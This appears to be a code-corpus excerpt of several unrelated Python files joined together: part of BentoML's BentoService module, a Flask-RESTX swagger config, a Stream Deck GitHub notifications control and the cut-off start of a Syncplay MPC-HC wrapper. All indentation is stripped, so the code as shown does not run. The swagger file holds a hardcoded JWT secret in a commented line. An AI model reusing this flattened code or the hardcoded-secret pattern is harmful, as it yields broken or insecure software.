"Reserved API name: '{}' is reserved for infra endpoints".format(api_name)
)
def validate_inference_api_route(route: str):
if re.findall(
r"[?#]+|^(//)|^:", route
): # contains '?' or '#' OR start with '//' OR start with ':'
# https://tools.ietf.org/html/rfc3986#page-22
raise InvalidArgument(
"The path {} contains illegal url characters".format(route)
)
if route in BENTOML_RESERVED_API_NAMES:
raise InvalidArgument(
"Reserved API route: '{}' is reserved for infra endpoints".format(route)
)
@dispatch(BaseInputAdapter,BaseOutputAdapter,str,str,str,int,int,bool)
def api_decorator(
*args,
input: BaseInputAdapter = None,
output: BaseOutputAdapter = None,
api_name: str = None,
route: str = None,
api_doc: str = None,
mb_max_batch_size: int = DEFAULT_MAX_BATCH_SIZE,
mb_max_latency: int = DEFAULT_MAX_LATENCY,
batch=False,
**kwargs,
): # pylint: disable=redefined-builtin
"""
A decorator exposed as `bentoml.api` for defining Inference API in a BentoService
class.
:param input: InputAdapter instance of the inference API
:param output: OutputAdapter instance of the inference API
:param api_name: API name, default to the user-defined callback function's function
name
:param route: Specify HTTP URL route of this inference API. By default,
`api.name` is used as the route. This parameter can be used for customizing
the URL route, e.g. `route="/api/v2/model_a/predict"`
Default: None (the same as api_name)
:param api_doc: user-facing documentation of the inference API. default to the
user-defined callback function's docstring
:param mb_max_batch_size: The maximum size of requests batch accepted by this
inference API. This parameter governs the throughput/latency trade off, and
avoids having large batches that exceed some resource constraint (e.g. GPU
memory to hold the entire batch's data). Default: 1000.
:param mb_max_latency: The latency goal of this inference API in milliseconds.
Default: 10000.
Example usage:
>>> from bentoml import BentoService, api
>>> from bentoml.adapters import JsonInput, DataframeInput
>>>
>>> class FraudDetectionAndIdentityService(BentoService):
>>>
>>> @api(input=JsonInput(), batch=True)
>>> def fraud_detect(self, json_list):
>>> # user-defined callback function that process inference requests
>>>
>>> @api(input=DataframeInput(input_json_orient='records'), batch=True)
>>> def identity(self, df):
>>> # user-defined callback function that process inference requests
"""
def decorator(func):
_api_name = func.__name__ if api_name is None else api_name
_api_route = _api_name if route is None else route
validate_inference_api_name(_api_name)
validate_inference_api_route(_api_route)
_api_doc = func.__doc__ if api_doc is None else api_doc
if input is None:
# Raise error when input adapter class passed without instantiation
if not args or not (
inspect.isclass(args[0]) and issubclass(args[0], BaseInputAdapter)
):
raise InvalidArgument(
"BentoService @api decorator first parameter must "
"be an instance of a class derived from "
"bentoml.adapters.BaseInputAdapter "
)
# noinspection PyPep8Naming
InputAdapter = args[0]
input_adapter = InputAdapter(*args[1:], **kwargs)
output_adapter = DefaultOutput()
else:
assert isinstance(input, BaseInputAdapter), (
"API input parameter must be an instance of a class derived from "
"bentoml.adapters.BaseInputAdapter"
)
input_adapter = input
output_adapter = output or DefaultOutput()
setattr(func, "_is_api", True)
setattr(func, "_input_adapter", input_adapter)
setattr(func, "_output_adapter", output_adapter)
setattr(func, "_api_name", _api_name)
setattr(func, "_api_route", _api_route)
setattr(func, "_api_doc", _api_doc)
setattr(func, "_mb_max_batch_size", mb_max_batch_size)
setattr(func, "_mb_max_latency", mb_max_latency)
setattr(func, "_batch", batch)
return func
return decorator
@dispatch(api_name=str,route=str,api_doc=str,http_methods=list,module_path=str,mb_max_batch_size=int,mb_max_latency=int)
def api_decorator(
*args,
api_name: str = None,
route: str = None,
api_doc: str = None,
http_methods: List[str] = None,
mb_max_batch_size: int = DEFAULT_MAX_BATCH_SIZE,
mb_max_latency: int = DEFAULT_MAX_LATENCY,
**kwargs,
): # pylint: disable=redefined-builtin
"""
A decorator exposed as `bentoml.api` for defining Inference API in a BentoService
class.
:param api_name: API name, default to the user-defined callback function's function
name
:param http_methods: the list of http methods for the API endpoint
:param route: Specify HTTP URL route of this inference API. By default,
`api.name` is used as the route. This parameter can be used for customizing
the URL route, e.g. `route="/api/v2/model_a/predict"`
Default: None (the same as api_name)
:param api_doc: user-facing documentation of the inference API. default to the
user-defined callback function's docstring
:param mb_max_batch_size: The maximum size of requests batch accepted by this
inference API. This parameter governs the throughput/latency trade off, and
avoids having large batches that exceed some resource constraint (e.g. GPU
memory to hold the entire batch's data). Default: 1000.
:param mb_max_latency: The latency goal of this inference API in milliseconds.
Default: 10000.
Example usage:
>>> from bentoml import BentoService, api
>>> from bentoml.adapters import JsonInput, DataframeInput
>>>
>>> class FraudDetectionAndIdentityService(BentoService):
>>>
>>> @api(api_name="fraud",route="fraud",http_methods=['GET'])
>>> def fraud_detect(self, json_list):
>>> # user-defined callback function that process inference requests
>>>
>>> @api(route="identity_check",api_doc="This is the docs")
>>> def identity(self, df):
>>> # user-defined callback function that process inference requests
"""
def decorator(func):
_api_name = func.__name__ if api_name is None else api_name
_api_route = _api_name if route is None else route
validate_inference_api_name(_api_name)
validate_inference_api_route(_api_route)
_api_doc = func.__doc__ if api_doc is None else api_doc
_http_methods = http_methods if http_methods else ['GET']
setattr(func, "_is_api", True)
setattr(func, "_api_name", _api_name)
setattr(func, "_api_route", _api_route)
setattr(func, "_api_doc", _api_doc)
setattr(func, "_http_methods", _http_methods)
# TODO: This could be a feature for scaling
# setattr(func, "_mb_max_batch_size", mb_max_batch_size)
# setattr(func, "_mb_max_latency", mb_max_latency)
return func
return decorator
def web_static_content_decorator(web_static_content):
"""Define web UI static files required to be bundled with a BentoService
Args:
web_static_content: path to directory containg index.html and static dir
>>> @web_static_content('./ui/')
>>> class MyMLService(BentoService):
>>> pass
"""
def decorator(bento_service_cls):
bento_service_cls._web_static_content = web_static_content
return bento_service_cls
return decorator
def artifacts_decorator(artifacts: List[BentoServiceArtifact]):
"""Define artifacts required to be bundled with a BentoService
Args:
artifacts (list(bentoml.artifact.BentoServiceArtifact)): A list of desired
artifacts required by this BentoService
"""
def decorator(bento_service_cls):
artifact_names = set()
for artifact in artifacts:
if not isinstance(artifact, BentoServiceArtifact):
raise InvalidArgument(
"BentoService @artifacts decorator only accept list of "
"BentoServiceArtifact instances, instead got type: '%s'"
% type(artifact)
)
if artifact.name in artifact_names:
raise InvalidArgument(
"Duplicated artifact name `%s` detected. Each artifact within one"
"BentoService must have an unique name" % artifact.name
)
artifact_names.add(artifact.name)
bento_service_cls._declared_artifacts = artifacts
bento_service_cls._env = BentoServiceEnv(
infer_pip_packages=True
)
return bento_service_cls
return decorator
def env_decorator(
pip_dependencies: List[str] = None,
pip_packages: List[str] = None,
pip_index_url: str = None,
pip_trusted_host: str = None,
pip_extra_index_url: str = None,
auto_pip_dependencies: bool = None,
infer_pip_packages: bool = False,
requirements_txt_file: str = None,
conda_channels: List[str] = None,
conda_overwrite_channels: bool = False,
conda_override_channels: bool = False,
conda_dependencies: List[str] = None,
conda_env_yml_file: str = None,
setup_sh: str = None,
docker_base_image: str = None,
zipimport_archives: List[str] = None,
):
"""Define environment and dependencies required for the BentoService being created
Args:
pip_packages:: list of pip_packages required, specified by package name
or with specified version `{package_name}=={package_version}`
pip_dependencies: same as pip_packages but deprecated
pip_index_url: passing down to pip install --index-url option
pip_trusted_host: passing down to pip install --trusted-host option
pip_extra_index_url: passing down to pip install --extra-index-url option
infer_pip_packages: whether to automatically find all the required
pip dependencies and pin their version
auto_pip_dependencies: same as infer_pip_packages but deprecated
requirements_txt_file: path to the requirements.txt where pip dependencies
are explicitly specified, with ideally pinned versions
conda_channels: list of extra conda channels other than default channels to be
used. This is equivalent to passing the --channels to conda commands
conda_override_channels: ensures that conda searches only your specified
channel and no other channels, such as default channels.
This is equivalent to passing the --override-channels option to conda
commands, or adding `nodefaults` to the `channels` in the environment.yml
conda_overwrite_channels: aliases to `override_channels`
conda_dependencies: list of conda dependencies required
conda_env_yml_file: use a pre-defined conda environment yml file
setup_sh: user defined setup bash script, it is executed in docker build time
docker_base_image: used for customizing the docker container image built with
BentoML saved bundle. Base image must either have both `bash` and `conda`
installed; or have `bash`, `pip`, `python` installed, in which case the user
is required to ensure the python version matches the BentoService bundle
zipimport_archives: list of zipimport archives paths relative to the module path
"""
if requirements_txt_file:
if pip_packages:
logger.warning("Ignoring pip_packages as requirements_txt_file is set.")
if pip_index_url or pip_trusted_host or pip_extra_index_url:
logger.warning(
"Ignoring pip related options as requirements_txt_file is set."
)
if pip_dependencies is not None:
logger.warning(
"`pip_dependencies` parameter in `@env` is being deprecated soon, use "
"`pip_packages` instead, e.g. `@env(pip_packages=[\"numpy\"])`"
)
if auto_pip_dependencies is not None:
logger.warning(
"`auto_pip_dependencies` parameter in `@env` is being deprecated soon,"
"use `infer_pip_packages` instead, e.g. `@env(infer_pip_packages=True)`"
)
def decorator(bento_service_cls):
bento_service_cls._env = BentoServiceEnv(
pip_packages=pip_packages or pip_dependencies,
pip_index_url=pip_index_url,
pip_trusted_host=pip_trusted_host,
pip_extra_index_url=pip_extra_index_url,
infer_pip_packages=infer_pip_packages or auto_pip_dependencies,
requirements_txt_file=requirements_txt_file,
conda_channels=conda_channels,
conda_override_channels=conda_override_channels,
conda_overwrite_channels=conda_overwrite_channels,
conda_dependencies=conda_dependencies,
conda_env_yml_file=conda_env_yml_file,
setup_sh=setup_sh,
docker_base_image=docker_base_image,
zipimport_archives=zipimport_archives,
)
return bento_service_cls
return decorator
def ver_decorator(major, minor):
"""Decorator for specifying the version of a custom BentoService.
Args:
major (int): Major version number for Bento Service
minor (int): Minor version number for Bento Service
BentoML uses semantic versioning for BentoService distribution:
* MAJOR is incremented when you make breaking API changes
* MINOR is incremented when you add new functionality without breaking the
existing API or functionality
* PATCH is incremented when you make backwards-compatible bug fixes
'Patch' is provided(or auto generated) when calling BentoService#save,
while 'Major' and 'Minor' can be defined with '@ver' decorator
>>> from bentoml import ver, artifacts
>>> from bentoml.service.artifacts.common import PickleArtifact
>>>
>>> @ver(major=1, minor=4)
>>> @artifacts([PickleArtifact('model')])
>>> class MyMLService(BentoService):
>>> pass
>>>
>>> svc = MyMLService()
>>> svc.pack("model", trained_classifier)
>>> svc.set_version("2019-08.iteration20")
>>> svc.save()
>>> # The final produced BentoService bundle will have version:
>>> # "1.4.2019-08.iteration20"
"""
def decorator(bento_service_cls):
bento_service_cls._version_major = major
bento_service_cls._version_minor = minor
return bento_service_cls
return decorator
def validate_version_str(version_str):
"""
Validate that version str format is either a simple version string that:
* Consist of only ALPHA / DIGIT / "-" / "." / "_"
* Length between 1-128
Or a valid semantic version https://github.com/semver/semver/blob/master/semver.md
"""
regex = r"[A-Za-z0-9_.-]{1,128}\Z"
semver_regex = r"^(?P<major>0|[1-9]\d*)\.(?P<minor>0|[1-9]\d*)\.(?P<patch>0|[1-9]\d*)(?:-(?P<prerelease>(?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\.(?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\+(?P<buildmetadata>[0-9a-zA-Z-]+(?:\.[0-9a-zA-Z-]+)*))?$" # noqa: E501
if (
re.match(regex, version_str) is None
and re.match(semver_regex, version_str) is None
):
raise InvalidArgument(
'Invalid BentoService version: "{}", it can only consist'
' ALPHA / DIGIT / "-" / "." / "_", and must be less than'
"128 characters".format(version_str)
)
if version_str.lower() == "latest":
raise InvalidArgument('BentoService version can not be set to "latest"')
def save(bento_service, base_path=None, version=None, labels=None):
"""
Save and register the given BentoService via BentoML's built-in model management
system. BentoML by default keeps track of all the SavedBundle's files and metadata
in local file system under the $BENTOML_HOME(~/bentoml) directory. Users can also
configure BentoML to save their BentoService to a shared Database and cloud object
storage such as AWS S3.
:param bento_service: target BentoService instance to be saved
:param base_path: optional - override repository base path
:param version: optional - save with version override
:param labels: optional - user defined labels
:return: saved_path: file path to where the BentoService is saved
"""
logger.warning(
"`from bentoml import save` is being deprecated soon, use BentoService#save "
"and BentoService#save_to_dir instead."
)
from bentoml.yatai.client import YataiClient
from bentoml.yatai.yatai_service import get_yatai_service
if base_path:
yatai_service = get_yatai_service(file_system_directory=base_path)
yatai_client = YataiClient(yatai_service)
else:
yatai_client = YataiClient()
return yatai_client.repository.upload(bento_service, version, labels)
class BentoService:
"""
BentoService is the base component for building prediction services using BentoML.
BentoService provide an abstraction for describing model artifacts and environment
dependencies required for a prediction service. And allows users to create inference
APIs that defines the inferencing logic and how the underlying model can be served.
Each BentoService can contain multiple models and serve multiple inference APIs.
Usage example:
>>> from bentoml import BentoService, env, api, artifacts
>>> from bentoml.adapters import DataframeInput
>>> from bentoml.frameworks.sklearn import SklearnModelArtifact
>>>
>>> @artifacts([SklearnModelArtifact('clf')])
>>> @env(pip_packages=["scikit-learn"])
>>> class MyMLService(BentoService):
>>>
>>> @api(http_methods=['GET'],api_name="predict")
>>> def predict(self, df):
>>> return self.artifacts.clf.predict(df)
>>>
>>> if __name__ == "__main__":
>>> bento_service = MyMLService()
>>> bento_service.pack('clf', trained_classifier_model)
>>> bento_service.save_to_dir('/bentoml_bundles')
"""
# List of inference APIs that this BentoService provides
_inference_apis: List[InferenceAPI] = []
# Name of this BentoService. It is default the class name of this BentoService class
_bento_service_name: str = None
# For BentoService loaded from saved bundle, this will be set to the path of bundle.
# When user install BentoService bundle as a PyPI package, this will be set to the
# installed site-package location of current python environment
_bento_service_bundle_path: str = None
# List of artifacts required by this BentoService class, declared via the `@env`
# decorator. This list is used for initializing an empty ArtifactCollection when
# the BentoService class is instantiated
_declared_artifacts: List[BentoServiceArtifact] = []
# An instance of ArtifactCollection, containing all required trained model artifacts
_artifacts: ArtifactCollection = None
# A `BentoServiceEnv` instance specifying the required dependencies and all system
# environment setups
_env = None
# When loading BentoService from saved bundle, this will be set to the version of
# the saved BentoService bundle
_bento_service_bundle_version = None
# See `ver_decorator` function above for more information
_version_major = None
_version_minor = None
# See `web_static_content` function above for more
_web_static_content = None
def __init__(self):
# When creating BentoService instance from a saved bundle, set version to the
# version specified in the saved bundle
self._bento_service_version = self.__class__._bento_service_bundle_version
self._dev_server_bundle_path: tempfile.TemporaryDirectory = None
self._dev_server_interrupt_event: multiprocessing.Event = None
self._dev_server_process: subprocess.Process = None
self._config_artifacts()
self._config_inference_apis()
self._config_environments()
def _config_environments(self):
self._env = self.__class__._env or BentoServiceEnv()
# for api in self._inference_apis:
# self._env.add_pip_packages(api.input_adapter.pip_dependencies)
# self._env.add_pip_packages(api.output_adapter.pip_dependencies)
for artifact in self.artifacts.get_artifact_list():
artifact.set_dependencies(self.env)
def _config_inference_apis(self):
self._inference_apis = []
for _, function in inspect.getmembers(
self.__class__,
predicate=lambda x: inspect.isfunction(x) or inspect.ismethod(x),
):
if hasattr(function, "_is_api"):
api_name = getattr(function, "_api_name")
route = getattr(function, "_api_route", None)
api_doc = getattr(function, "_api_doc")
http_methods = getattr(function, "_http_methods")
# TODO: Add this while scaling
# mb_max_latency = getattr(function, "_mb_max_latency")
# mb_max_batch_size = getattr(function, "_mb_max_batch_size")
# Bind api method call with self(BentoService instance)
user_func = function.__get__(self)
self._inference_apis.append(
InferenceAPI(
self,
api_name,
api_doc,
user_func=user_func,
http_methods=http_methods,
# TODO: Add this while scaling
# mb_max_latency=mb_max_latency,
# mb_max_batch_size=mb_max_batch_size,
route=route,
)
)
# @dispatch()
# def _config_inference_apis(self):
# self._inference_apis = []
#
# for _, function in inspect.getmembers(
# self.__class__,
# predicate=lambda x: inspect.isfunction(x) or inspect.ismethod(x),
# ):
# if hasattr(function, "_is_api"):
# api_name = getattr(function, "_api_name")
# route = getattr(function, "_api_route", None)
# api_doc = getattr(function, "_api_doc")
# input_adapter = getattr(function, "_input_adapter")
# output_adapter = getattr(function, "_output_adapter")
# mb_max_latency = getattr(function, "_mb_max_latency")
# mb_max_batch_size = getattr(function, "_mb_max_batch_size")
# batch = getattr(function, "_batch")
#
# # Bind api method call with self(BentoService instance)
# user_func = function.__get__(self)
#
# self._inference_apis.append(
# InferenceAPI(
# self,
# api_name,
# api_doc,
# input_adapter=input_adapter,
# user_func=user_func,
# output_adapter=output_adapter,
# mb_max_latency=mb_max_latency,
# mb_max_batch_size=mb_max_batch_size,
# batch=batch,
# route=route,
# )
# )
def _config_artifacts(self):
self._artifacts = ArtifactCollection.from_artifact_list(
self._declared_artifacts
)
if self._bento_service_bundle_path:
# For pip installed BentoService, artifacts directory is located at
# 'package_path/artifacts/', but for loading from bundle directory, it is
# in 'path/{service_name}/artifacts/'
if os.path.isdir(
os.path.join(self._bento_service_bundle_path, ARTIFACTS_DIR_NAME)
):
artifacts_path = os.path.join(
self._bento_service_bundle_path, ARTIFACTS_DIR_NAME
)
else:
artifacts_path = os.path.join(
self._bento_service_bundle_path, self.name, ARTIFACTS_DIR_NAME
)
self.artifacts.load_all(artifacts_path)
@property
def inference_apis(self) -> List[InferenceAPI]:
"""Return a list of user defined API functions
Returns:
list(InferenceAPI): List of Inference API objects
"""
return self._inference_apis
def get_inference_api(self, api_name):
"""Find the inference API in this BentoService with a specific name.
When the api_name is None, this returns the first Inference API found in the
`self.inference_apis` list.
:param api_name: the target Inference API's name
:return:
"""
if api_name:
try:
return next(
(api for api in self.inference_apis if api.name == api_name)
)
except StopIteration:
raise NotFound(
"Can't find API '{}' in service '{}'".format(api_name, self.name)
)
elif len(self.inference_apis) > 0:
return self.inference_apis[0]
else:
raise NotFound(f"Can't find any inference API in service '{self.name}'")
@property
def artifacts(self):
""" Returns the ArtifactCollection instance specified with this BentoService
class
Returns:
artifacts(ArtifactCollection): A dictionary of packed artifacts from the
artifact name to the BentoServiceArtifact instance
"""
return self._artifacts
@property
def env(self):
return self._env
@property
def web_static_content(self):
return self._web_static_content
def get_web_static_content_path(self):
if not self.web_static_content:
return None
if self._bento_service_bundle_path:
return os.path.join(
self._bento_service_bundle_path, self.name, 'web_static_content',
)
else:
return os.path.join(os.getcwd(), self.web_static_content)
@hybridmethod
@property
def name(self):
"""
:return: BentoService name
"""
return self.__class__.name() # pylint: disable=no-value-for-parameter
@name.classmethod
def name(cls): # pylint: disable=no-self-argument,invalid-overridden-method
"""
:return: BentoService name
"""
if cls._bento_service_name is not None:
if not cls._bento_service_name.isidentifier():
raise InvalidArgument(
'BentoService#_bento_service_name must be valid python identifier'
'matching regex `(letter|"_")(letter|digit|"_")*`'
)
return cls._bento_service_name
else:
# Use python class name as service name
return cls.__name__
def set_version(self, version_str=None):
"""Set the version of this BentoService instance. Once the version is set
explicitly via `set_version`, the `self.versioneer` method will no longer be
invoked when saving this BentoService.
"""
if version_str is None:
version_str = self.versioneer()
if self._version_major is not None and self._version_minor is not None:
# BentoML uses semantic versioning for BentoService distribution
# when user specified the MAJOR and MINOR version number along with
# the BentoService class definition with '@ver' decorator.
# The parameter version(or auto generated version) here will be used as
# PATCH field in the final version:
version_str = ".".join(
[str(self._version_major), str(self._version_minor), version_str]
)
validate_version_str(version_str)
if self.__class__._bento_service_bundle_version is not None:
logger.warning(
"Overriding loaded BentoService(%s) version:%s to %s",
self.__class__._bento_service_bundle_path,
self.__class__._bento_service_bundle_version,
version_str,
)
self.__class__._bento_service_bundle_version = None
if (
self._bento_service_version is not None
and self._bento_service_version != version_str
):
logger.warning(
"Resetting BentoService '%s' version from %s to %s",
self.name,
self._bento_service_version,
version_str,
)
self._bento_service_version = version_str
return self._bento_service_version
def versioneer(self):
"""
Function used to generate a new version string when saving a new BentoService
bundle. User can also override this function to get a customized version format
"""
datetime_string = datetime.now().strftime("%Y%m%d%H%M%S")
random_hash = uuid.uuid4().hex[:6].upper()
# Example output: '20191009135240_D246ED'
return datetime_string + "_" + random_hash
@property
def version(self):
"""
Return the version of this BentoService. If the version of this BentoService has
not been set explicitly via `self.set_version`, a new version will be generated
with the `self.versioneer` method. User can customize this version str either by
setting the version with `self.set_version` before a `save` call, or override
the `self.versioneer` method to customize the version str generator logic.
For BentoService loaded from a saved bundle, this will simply return the version
information found in the saved bundle.
:return: BentoService version str
"""
if self.__class__._bento_service_bundle_version is not None:
return self.__class__._bento_service_bundle_version
if self._bento_service_version is None:
self.set_version(self.versioneer())
return self._bento_service_version
def save(self, yatai_url=None, version=None, labels=None):
"""
Save and register this BentoService via BentoML's built-in model management
system. BentoML by default keeps track of all the SavedBundle's files and
metadata in local file system under the $BENTOML_HOME(~/bentoml) directory.
Users can also configure BentoML to save their BentoService to a shared Database
and cloud object storage such as AWS S3.
:param yatai_url: optional - URL path to Yatai server
:param version: optional - save with version override
:param labels: optional - labels dictionary
:return: saved_path: file path to where the BentoService is saved
"""
from bentoml.yatai.client import get_yatai_client
yc = get_yatai_client(yatai_url)
return yc.repository.upload(self, version, labels)
def save_to_dir(self, path, version=None):
"""Save this BentoService along with all its artifacts, source code and
dependencies to target file path, assuming path exist and empty. If target path
is not empty, this call may override existing files in the given path.
:param path (str): Destination of where the bento service will be saved
:param version: optional - save with version override
"""
return save_to_dir(self, path, version)
@hybridmethod
def pack(self, name, *args, **kwargs):
"""
BentoService#pack method is used for packing trained model instances with a
BentoService instance and make it ready for BentoService#save.
pack(name, *args, **kwargs):
:param name: name of the declared model artifact
:param args: args passing to the target model artifact to be packed
:param kwargs: kwargs passing to the target model artifact to be packed
:return: this BentoService instance
"""
self.artifacts.get(name).pack(*args, **kwargs)
return self
@pack.classmethod
def pack(cls, *args, **kwargs): # pylint: disable=no-self-argument
"""
**Deprecated**: Legacy `BentoService#pack` class method, no longer supported
"""
raise BentoMLException(
"BentoService#pack class method is deprecated, use instance method `pack` "
"instead. e.g.: svc = MyBentoService(); svc.pack('model', model_object)"
)
def get_bento_service_metadata_pb(self):
return SavedBundleConfig(self).get_bento_service_metadata_pb()
pip_dependencies_map = None
def start_dev_server(
self, port=None, enable_microbatch=False, enable_ngrok=False, debug=False
):
if enable_microbatch:
raise NotImplementedError(
"start_dev_server with enable_microbatch=True is not implemented"
)
if self._dev_server_process:
logger.warning(
"There is already a running dev server, "
"please call `service.stop_dev_server()` first."
)
return
try:
self._dev_server_bundle_path = tempfile.TemporaryDirectory()
self.save_to_dir(self._dev_server_bundle_path.name)
def print_log(p):
for line in p.stdout:
print(line.decode(), end='')
def run(path, interrupt_event):
my_env = os.environ.copy()
# my_env["FLASK_ENV"] = "development"
cmd = [sys.executable, "-m", "bentoml", "serve"]
if port:
cmd += ['--port', f'{port}']
if enable_microbatch:
cmd += ['--enable-microbatch']
else:
cmd += ['--disable-microbatch']
if enable_ngrok:
cmd += ['--run-with-ngrok']
if debug:
cmd += ['--debug']
cmd += [path]
p = subprocess.Popen(
cmd,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
env=my_env,
)
threading.Thread(target=print_log, args=(p,), daemon=True).start()
interrupt_event.wait()
p.terminate()
self._dev_server_interrupt_event = multiprocessing.Event()
self._dev_server_process = multiprocessing.Process(
target=run,
args=(
self._dev_server_bundle_path.name,
self._dev_server_interrupt_event,
),
daemon=True,
)
self._dev_server_process.start()
logger.info(
f"======= starting dev server on port: {port if port else 5000} ======="
)
except Exception as e: # pylint: disable=broad-except
self.stop_dev_server(skip_log=True)
raise e
def stop_dev_server(self, skip_log=False):
if self._dev_server_interrupt_event:
self._dev_server_interrupt_event.set()
self._dev_server_interrupt_event = None
if self._dev_server_process:
self._dev_server_process.join()
assert not self._dev_server_process.is_alive()
self._dev_server_process = None
logger.info("Dev server has stopped.")
elif not skip_log:
logger.warning("No dev server is running.")
if self._dev_server_bundle_path:
self._dev_server_bundle_path.cleanup()
self._dev_server_bundle_path = None
def __del__(self):
if hasattr(self, "_dev_server_interrupt_event"): # __init__ may not be called
self.stop_dev_server(skip_log=True)
@inject
def infer_pip_dependencies_map(
self,
bentoml_version: str = Provide[
BentoMLContainer.bento_bundle_deployment_version
],
):
if not self.pip_dependencies_map:
self.pip_dependencies_map = {}
bento_service_module = sys.modules[self.__class__.__module__]
if hasattr(bento_service_module, "__file__"):
bento_service_py_file_path = bento_service_module.__file__
reqs, unknown_modules = seek_pip_packages(bento_service_py_file_path)
self.pip_dependencies_map.update(reqs)
for module_name in unknown_modules:
logger.warning(
"unknown package dependency for module: %s", module_name
)
# Reset bentoml to configured deploy version - this is for users using
# customized BentoML branch for development but use a different stable
# version for deployment
#
# For example, a BentoService created with local dirty branch will fail
# to deploy with docker due to the version can't be found on PyPI, but
# get_bentoml_deploy_version gives the user the latest released PyPI
# version that's closest to the `dirty` branch
self.pip_dependencies_map['bentoml'] = bentoml_version
return self.pip_dependencies_map
|
swaggerConfig.py
|
from flask import Flask, g, request
from flask_restx import Api
import time, datetime, os, json, decimal
# from flask_jwt_extended import get_jwt_identity
import threading
# siteroot = os.path.realpath(os.path.dirname(__file__) + "/service/auth/")
# json_url = os.path.join(siteroot, "OAuth.json")
# OAuthJson = json.loads(open(json_url).read())
app = Flask(__name__)
# app.config["JWT_SECRET_KEY"] = "P+APugQ}&?cwwPXA]u+cEcfVnp8i]&"
# app.config["JWT_ACCESS_TOKEN_EXPIRES"] = False
# jwt = JWTManager(app)
# @app.before_request
# def before_request():
# g.start_time = time.time()
# g.response = {}
# def myconverter(o):
# if isinstance(o, datetime.datetime) or isinstance(o, datetime.date):
# return o.__str__()
# elif isinstance(o, decimal.Decimal):
# return float(o)
# @app.after_request
# def after_request(res):
# body = (
# (request.json if request.json is not None else dict(request.form))
# if request.method != "GET"
# else None
# )
# userid = None
# try:
# userid = get_jwt_identity()
# except Exception as e:
# pass
# newObject = [
# {
# "userid": userid,
# "path": request.path,
# "method": request.method,
# "browser": request.user_agent.browser,
# "browser_version": request.user_agent.version,
# "os": request.user_agent.platform,
# "ip_address": request.remote_addr,
# "params": dict(request.args),
# "body": body,
# "status": (g.response).get("status"),
# "duration": int((time.time() - g.start_time) * 1000),
# }
# ]
# threading.Thread(target=ServerLog, args=(newObject), daemon=True).start()
# try:
# if (res.get_data()).decode("utf-8") == "null\n":
# res.set_data(json.dumps(g.response, default=myconverter))
# return res
# except Exception as e:
# return res
# def ServerLog(logObject):
# StoreLog().log(logObject)
# app.config.SWAGGER_UI_OAUTH_CLIENT_ID = OAuthJson["google"]["clientId"]
# app.config.SWAGGER_UI_OAUTH_CLIENT_SECRET = OAuthJson["google"]["clientSecret"]
# app.config.SWAGGER_UI_OAUTH_REALM = "-"
# app.config.SWAGGER_UI_OAUTH_APP_NAME = "IndiaConnects"
# authorizations = {
# "api_key": {"type": "apiKey", "in": "header", "name": "AUTHORIZATION"}
# }
api = Api(
app,
version="1.0",
title="GMusic",
description="API DOCUMENTATION",
# security=["api_key"],
# authorizations=authorizations,
)
|
github_notifications_control.py
|
import os
import threading
from subprocess import Popen, DEVNULL
from time import sleep
from typing import Any, Dict
import requests as requests
from devdeck_core.controls.deck_control import DeckControl
class GithubNotificationsControl(DeckControl):
def __init__(self, key_no: int, **kwargs) -> None:
super().__init__(key_no, **kwargs)
self.thread = None
self.running = False
self.last_url = None
def initialize(self) -> None:
self.thread = threading.Thread(target=self._update_loop)
self.running = True
self.thread.start()
def pressed(self) -> None:
if self.last_url is None:
self._update_display()
return
browser = self.settings.get('browser') or 'firefox'
Popen([browser, self.last_url], stdout=DEVNULL, stderr=DEVNULL)
# Wait 5 seconds for the browser to load the page before refreshing the display.
sleep(5)
self._update_display()
def get_notifications(self) -> Dict[str, Any]:
assert self.settings['token'], 'Please specify your Github API token in `settings.yml`'
headers = {
'Authorization': f"token {self.settings['token']}",
'User-Agent': 'devdeck',
}
return requests.get('https://api.github.com/notifications', headers=headers).json()
def _update_display(self) -> None:
notifications = self.get_notifications()
count = len(notifications)
alert_color = self.settings.get('color') or '#ff2b2b'
color = alert_color if count > 0 else '#ffffff'
self.last_url = notifications[0]['subject']['url'] \
.replace('api.', '').replace('repos/', '').replace('pulls/', 'pull/') \
if count > 0 else None
with self.deck_context() as context:
with context.renderer() as r:
r.image(os.path.join(os.path.dirname(__file__), "../assets/font-awesome", 'github.png')) \
.width(240) \
.height(240) \
.center_horizontally() \
.y(225) \
.end()
r.text(str(count)) \
.center_horizontally() \
.center_vertically(-175) \
.font_size(150) \
.color(color) \
.end()
def _update_loop(self) -> None:
while self.running is True:
self._update_display()
sleep(self.settings.get('refresh_seconds') or 60)
def dispose(self) -> None:
self.running = False
if self.thread:
self.thread.join()
|
mpc.py
|
import os.path
import re
import time
import threading
import _thread
from functools import wraps
import win32con, win32api, win32gui, ctypes, ctypes.wintypes #@UnresolvedImport @UnusedImport
from syncplay import constants
from syncplay.messages import getMessage
from syncplay.players.basePlayer import BasePlayer
from syncplay.utils import retry
class MpcHcApi:
def __init__(self):
self.callbacks = self.__Callbacks()
self.loadState = None
self.playState = None
self.filePlaying = None
self.fileDuration = None
self.filePath = None
self.lastFilePosition = None
self.version = None
self.__playpause_warden = False
self.__locks = self.__Locks()
self.__mpcExistenceChecking = threading.Thread(target=self.__mpcReadyInSlaveMode, name="Check MPC window")
self.__mpcExistenceChecking.setDaemon(True)
self.__listener = self.__Listener(self, self.__locks)
self.__listener.setDaemon(True)
self.__listener.start()
self.__locks.listenerStart.wait()
def waitForFileStateReady(f): #@NoSelf
@wraps(f)
def wrapper(self, *args, **kwds):
if not self.__locks.fileReady.wait(constants.MPC_LOCK_WAIT_TIME):
raise self.PlayerNotReadyException()
return f(self, *args, **kwds)
return wrapper
def startMpc(self, path, args=()):
args = "%s /slave %s" % (" ".join(args), str(self.__listener.hwnd))
win32api.ShellExecute(0, "open", path, args, None, 1)
if not self.__locks.mpcStart.wait(constants.MPC_OPEN_MAX_WAIT_TIME):
raise self.NoSlaveDetectedException(getMessage("mpc-slave-error"))
self.__mpcExistenceChecking.start()
def openFile(self, filePath):
self.__listener.SendCommand(self.CMD_OPENFILE, filePath)
def isPaused(self):
return self.playState != self.__MPC_PLAYSTATE.PS_PLAY and self.playState is not None
def askForVersion(self):
self.__listener.SendCommand(self.CMD_GETVERSION)
@waitForFileStateReady
def pause(self):
self.__listener.SendCommand(self.CMD_PAUSE)
@waitForFileStateReady
def playPause(self):
